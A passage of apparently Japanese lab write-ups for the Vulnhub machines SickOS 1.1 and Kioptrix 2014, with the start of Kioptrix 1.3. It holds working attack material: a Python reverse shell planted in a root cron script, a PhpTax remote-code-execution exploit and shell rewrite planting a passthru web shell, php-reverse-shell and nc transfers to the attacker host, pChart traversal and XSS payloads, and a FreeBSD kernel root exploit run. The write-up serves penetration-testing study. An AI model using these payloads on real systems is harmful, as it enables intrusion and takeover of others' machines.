connect.py
さっきのdirbで実は気になっていた「connect.py」を調べる。
www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www cd /var/www www-data@SickOs:/var/www$ ls ls connect.py index.php robots.txt wolfcms www-data@SickOs:/var/www$ cat connect.py cat connect.py #!/usr/bin/python print "I Try to connect things very frequently\n" print "You may want to try my services"
頻繁にconnect? ますます怪しい。
これは何のことだったのかcronを見ると分かった。
www-data@SickOs:/var/www$ ls -al /etc/cron.d ls -al /etc/cron.d total 20 drwxr-xr-x 2 root root 4096 Dec 5 2015 . drwxr-xr-x 90 root root 4096 May 3 20:31 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rw-r--r-- 1 root root 52 Dec 5 2015 automate -rw-r--r-- 1 root root 544 Jul 2 2015 php5 www-data@SickOs:/var/www$ cat /etc/cron.d/automate cat /etc/cron.d/automate * * * * * root /usr/bin/python /var/www/connect.py
つまり、root権限で定期的に実行される「connect.py」を弄ってやればroot取れる。
attacker
# cat getroot.py
#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.3",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
root@kali:~/EXattack/Vulunhub/SickOS1-1# python -m SimpleHTTPServer 80
victim www-data@SickOs:/tmp$ cd /tmp cd /tmp www-data@SickOs:/tmp$ wget 10.10.10.3/getroot.py wget 10.10.10.3/getroot.py --2020-05-03 23:12:22-- http://10.10.10.3/getroot.py Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 238 [text/plain] Saving to: `getroot.py' 100%[======================================>] 238 --.-K/s in 0s 2020-05-03 23:12:22 (17.2 MB/s) - `getroot.py' saved [238/238] www-data@SickOs:/tmp$ cp /tmp/getroot.py /var/www/connect.py cp /tmp/getroot.py /var/www/connect.py
attacker # nc -nlvp 8080
あとは「connect.py」の起動を待つのみ。
動けばroot取れる。
attacker # id uid=0(root) gid=0(root) groups=0(root)
おまけ
# cd /root # ls a0216ea4d51874464078c618298b1367.txt # cat a0216ea4d518^? cat: a0216ea4d518: No such file or directory # cat *.txt If you are viewing this!! ROOT! You have Succesfully completed SickOS1.1. Thanks for Trying
こういうのもあったのか
# dirb http://10.10.10.9/wolfcms -p 10.10.10.9:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 3 13:49:54 2020
URL_BASE: http://10.10.10.9/wolfcms/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.9/wolfcms/ ----
+ http://10.10.10.9/wolfcms/composer (CODE:200|SIZE:403)
+ http://10.10.10.9/wolfcms/config (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.9/wolfcms/docs/
+ http://10.10.10.9/wolfcms/favicon.ico (CODE:200|SIZE:894)
+ http://10.10.10.9/wolfcms/index (CODE:200|SIZE:3975)
+ http://10.10.10.9/wolfcms/index.php (CODE:200|SIZE:3975)
==> DIRECTORY: http://10.10.10.9/wolfcms/public/
+ http://10.10.10.9/wolfcms/robots (CODE:200|SIZE:0)
+ http://10.10.10.9/wolfcms/robots.txt (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.9/wolfcms/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.9/wolfcms/public/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun May 3 13:50:01 2020
DOWNLOADED: 4612 - FOUND: 7
# dirb http://10.10.10.9/cgi-bin -p 10.10.10.9:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 3 13:50:10 2020
URL_BASE: http://10.10.10.9/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.9/cgi-bin/ ----
+ http://10.10.10.9/cgi-bin/status (CODE:200|SIZE:197)
-----------------
END_TIME: Sun May 3 13:50:17 2020
DOWNLOADED: 4612 - FOUND: 1
終
cronとhttp.confと.htaccessを注意深くみる。
vulnhub Kioptrix 5(1.4) 雑記
kioptrix 5(1-4)
何も考えずに、いつも通り仮想ディスクを作らないで後からIDEを追加しても起動しなかった。
元々配信されていたイメージ(.vmdk)に加えて、*fix.zipをダウンロードする。
*fix.zipに含まれている「*.vbox」からVMを作り、すでにセットされているストレージを消して改めて「*.vmdk」をIDEに追加する。
その後、*fix.zipに含まれていた画像にある通り、VMを起動した後の「mountroot>」プロンプトにてufs:/dev/ada0p2と入力すると起動した。
pentest
サービス調査
# nmap -p- 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:13 EDT Nmap scan report for 10.10.10.8 Host is up (0.00067s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http 8080/tcp open http-proxy MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 117.95 seconds # nmap -p22,80,8080 -sV -version-all 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:17 EDT Nmap scan report for 10.10.10.8 Host is up (0.00072s latency). PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds
nmap長いなぁ
気になりどころ
- port80 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
- port8080 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
詳細
80ポートのApacheからのアプローチ
# nikto -h 10.10.10.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.8
+ Target Hostname: 10.10.10.8
+ Target Port: 80
+ Start Time: 2020-04-30 08:21:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server may leak inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8672 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2020-04-30 08:23:20 (GMT-4) (98 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.8
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Apr 30 08:29:52 2020
URL_BASE: http://10.10.10.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.8/ ----
+ http://10.10.10.8/cgi-bin/ (CODE:403|SIZE:210)
+ http://10.10.10.8/index.html (CODE:200|SIZE:152)
-----------------
END_TIME: Thu Apr 30 08:30:18 2020
DOWNLOADED: 4612 - FOUND: 2
「CVE-2002-0082」ってkioptrix1でもあった気がするが刺さるのか?
どうやらapacheのバージョンが一致しないので刺さらないらしい。
Apacheのバージョンにも何も無さそうだし、phpにも何も無いので詰みかぁ。
と思ったがindex.htmlのソースを見てみると
<html> <head> <!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> --> </head> <body> <h1>It works!</h1> </body> </html>
「pChart2.1.3/index.php」?
アクセスする。
何か管理画面ぽいのが出てきた。
# searchsploit pChart 2.1
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilitie | exploits/php/webapps/31173.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
# cat /usr/share/exploitdb/exploits/php/webapps/31173.txt
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A
[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.
Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.
Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.
色々あるみたいなのでやってみる。
firefoxから「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd」へのアクセス # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
firefoxにて、↑のディレクトリトラバーサルと
http://10.10.10.8/pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script>の発火を確認。
ディレクトリトラバーサルできるけど何見れば良いか分からん。
そういや、dirbで403出てるディレクトリあったのでそこにアクセス制御してそうな「.htaccess」とか「httpd.conf」でも見てみるか。
「.htaccess」は無いっぽい。
「 /etc/httpd/conf/httpd.conf」無い?
「/usr/local/apache2/conf/」でもない?
そういえばhttpd.confってOSごとに場所違った気がするので、今回FreeBSDだし違うとこにありそう。
推測参考 FreeBSDでApacheのインストールと起動 - Qiita
今回はApache 2.2.xなので、「/usr/local/etc/apache22/httpd.conf」と予測。
firefoxで「http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf」へアクセス
#
# This is the main Apache HTTP server configuration file. It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.
# In particular, see
# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They're here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"
# with ServerRoot set to "/usr/local" will be interpreted by the
# server as "/usr/local//var/log/foo_log".
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path. If you point
# ServerRoot at a non-local disk, be sure to point the LockFile directive
# at a local disk. If you wish to share the same ServerRoot for multiple
# httpd daemons, you will need to change at least LockFile and PidFile.
#
ServerRoot "/usr/local"
#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80
Listen 80
Listen 8080
(snip)
# "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/usr/local/www/apache22/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
(snip)
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
Include etc/apache22/Includes/*.conf
ちゃんとありました。
やはり、httpd.confでアクセス制御をしていたようで。
port 8080もアクセス制御がされているようだけど、「Mozilla4_browser」だけアクセスできる?
# curl -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /</title> </head> <body> <h1>Index of /</h1> <ul><li><a href="phptax/"> phptax/</a></li> </ul> </body></html>
phptax?
# searchsploit phptax
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit) | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution | exploits/php/webapps/21665.txt
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
metasploitは使いたくない。
でもphptaxのバージョン分からんし一か八か試すか?
しかし調べてみたところ、ver0.8が最新バージョンぽい?
そうだとしたらガバガバセキュリティだが、それにかける。
新しい方の、25849.txtでチャレンジ。
# cat /usr/share/exploitdb/exploits/php//webapps/25849.txt
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / `\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
# Exploit Title : PhpTax File Manipulation(newvalue,field) Remote Code Execution
# Date : 31 May 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://phptax.sourceforge.net/
# Software Link : http://sourceforge.net/projects/phptax/
# Version : 0.8
# Tested on : Window and Linux
#####################################################
#VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION
#####################################################
#index.php
#LINE 32: fwrite fwrite($zz, "$_GET['newvalue']");
#LINE 31: $zz = fopen("./data/$field", "w");
#LINE 2: $field = $_GET['field'];
#####################################################
#DESCRIPTION
#####################################################
#An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability.
#User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file.
#An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.
#####################################################
#EXPLOIT
#####################################################
<?php
$options = getopt('u:');
if(!isset($options['u']))
die("\n Usage example: php exploit.php -u http://target.com/ \n");
$url = $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";
$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Content-Type: text/plain');
echo " [+] Submitting request to: {$options['u']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n {$url}/data/rce.php?cmd=id\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}
?>
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
テキストだけかと思ったがちゃんとexploitついている。
「/phptax/index.php」の「2,31,32行目」に問題があるからexploitできるということか。
心配なので一応「usr/local/apache22//phptax/index.php」を確認。
# curl -vI -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080/phptax/index.php * Trying 10.10.10.8:8080... * TCP_NODELAY set * Connected to 10.10.10.8 (10.10.10.8) port 8080 (#0) > GET /phptax/index.php HTTP/1.1 > Host: 10.10.10.8:8080 > Accept: */* > User-Agent:Mozilla/4.0 > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK HTTP/1.1 200 OK < Date: Fri, 01 May 2020 03:44:35 GMT Date: Fri, 01 May 2020 03:44:35 GMT < Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 < X-Powered-By: PHP/5.3.8 X-Powered-By: PHP/5.3.8 < Transfer-Encoding: chunked Transfer-Encoding: chunked < Content-Type: text/html Content-Type: text/html < * Excess found: excess = 4131 url = /phptax/index.php (zero-length body) * Connection #0 to host 10.10.10.8 left intact
firefoxで「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/www/apache22/data2/phptax/index.php」へアクセス。
ファイルのありかは「httpd.conf」から分かる。
<?php
$field=$_GET[field];
(snip)
if ($_GET[newvalue]) {
$zz=fopen("./data/$field","w");
fwrite($zz,"$_GET[newvalue]");
fclose($zz);
}
(snip)
ということで、「25849.txt」にならってexploitコードを書き換えれば良いと言うことか。
# cp /usr/share/exploitdb/exploits/php//webapps/25849.txt phptax_exploit.php
このexploit使おうとしたら「curl_init()」知らないと怒られたので入れる。
# php -v PHP 7.3.15-3 (cli) (built: Feb 23 2020 07:15:44) ( NTS ) (snip) # apt install php7.3-curl
よっしゃこれでいけるか。
# php phptax_exploit.php -u http://10.10.10.8:8080/phptax
(snip)
#####################################################
#EXPLOIT
#####################################################
[+] Submitting request to: http://10.10.10.8:8080/phptax
[+] Exploit was unsuccessful.
はい。ダメです。
もう分からんからシェルスクリプトで書き直す。
# !/bin/sh # ./phptax_exploit.sh # phptax < ver 0.8 exploit # vulncode in phptax/index.php # $field = $_GET['field']; in line 2 # $zz = fopen("./data/$field", "w"); in line 31 # fwrite fwrite($zz, "$_GET['newvalue']"); in line 32 target_site_to_phptax_index_path="$1" #example "http://10.10.10.8:8080/phptax/" remote_code="$2" #example "id" URLencode!!!! space is "%20" curl -vI -H "User-Agent:Mozilla/4.0" "$1/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E" echo -e "\n" curl -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/rce.php?cmd=$2"
適当に書いたから許して。
何故かここからreverse shellに苦戦。
結局上手くいったのは、reverse shellするphpを送り付けて実行するパターン。
php-reverse-shellがkaliの場合ある # cp /usr/share/webshells/php/php-reverse-shell.php reverse.php #### ここら辺変える $VERSION = "1.0"; $ip = '10.10.10.3'; // CHANGE THIS $port = 443; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0;
window 1 # nc -nlvp 8080 < reverse.php
window 2 # ./phptax_exploit.sh http://10.10.10.8:8080/phptax nc%2010.10.10.3%208080%20%3E%20reverse.php%20\&
window 1 # nc -nlvp 443
windows 2 # curl -v -XGET -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/reverse.php
やっとシェル取れた。
$ id uid=80(www) gid=80(www) groups=80(www) $ uname -a FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
FreeBSD 9.0は果たしてあるか。
# searchsploit FreeBSD 9.0
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation | exploits/freebsd/local/26368.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
ちょうど良さそうなのがあるので、「28718.c」を試す。
# cp /usr/share/exploitdb/exploits/freebsd/local/28718.c freebsd9.0_priv.c
このプログラムは改行無いと怒られたので改行忘れずに。
victim $ wget http://10.10.10.3/freebsd9.0_priv.c wget: not found
マジか。
またncでファイルやりとりするか。
attacker # nc -nlvp 8080 < freebsd9.0_priv.c
victim $ cd /tmp $ nc 10.10.10.3 8080 > priv.c $ gcc priv.c $ ./a.out [+] SYSRET FUCKUP!! [+] Start Engine... [+] Crotz... [+] Crotz... [+] Crotz... [+] Woohoo!!! $ id uid=0(root) gid=0(wheel) groups=0(wheel) $ cd /root $ ls .cshrc .history .k5login .login .mysql_history .profile congrats.txt folderMonitor.log httpd-access.log lazyClearLog.sh monitor.py ossec-alerts.log $ cat congrats.txt If you are reading this, it means you got root (or cheated). Congratulations either way... Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them. As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targetted attacks. For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems. As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files: /root/folderMonitor.log /root/httpd-access.log (softlink) /root/ossec-alerts.log (softlink) The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this. The httpd-access.log is rather self-explanatory . Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain files. This one should've detected a few of your web attacks. Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself. Be good... loneferret http://www.kioptrix.com p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :)
やったぜ。
終わり
exploitコードが改行無いのはデフォ?
vulnhub Kioptrix1.3 雑記
kioptrix 1.3
pentest
arp-scan -I eth0 -lでipスキャン
サービス調査
# nmap -p- 10.10.10.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT Nmap scan report for 10.10.10.6 Host is up (0.00047s latency). Not shown: 39528 closed ports, 26003 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 38.42 seconds root@kali:~/EXattack/Vulunhub/kioptrix1-3# nmap -P0 -p22,80,139,445 -sV -version-all 10.10.10.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT Nmap scan report for 10.10.10.6 Host is up (0.00088s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.17 seconds
気になりどころ
- OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
- Samba smbd 3.X - 4.X (workgroup: WORKGROUP) ×2
詳細
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
月並み?
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
# nikto -h 10.10.10.6
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.6
+ Target Hostname: 10.10.10.6
+ Target Port: 80
+ Start Time: 2020-04-29 03:56:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
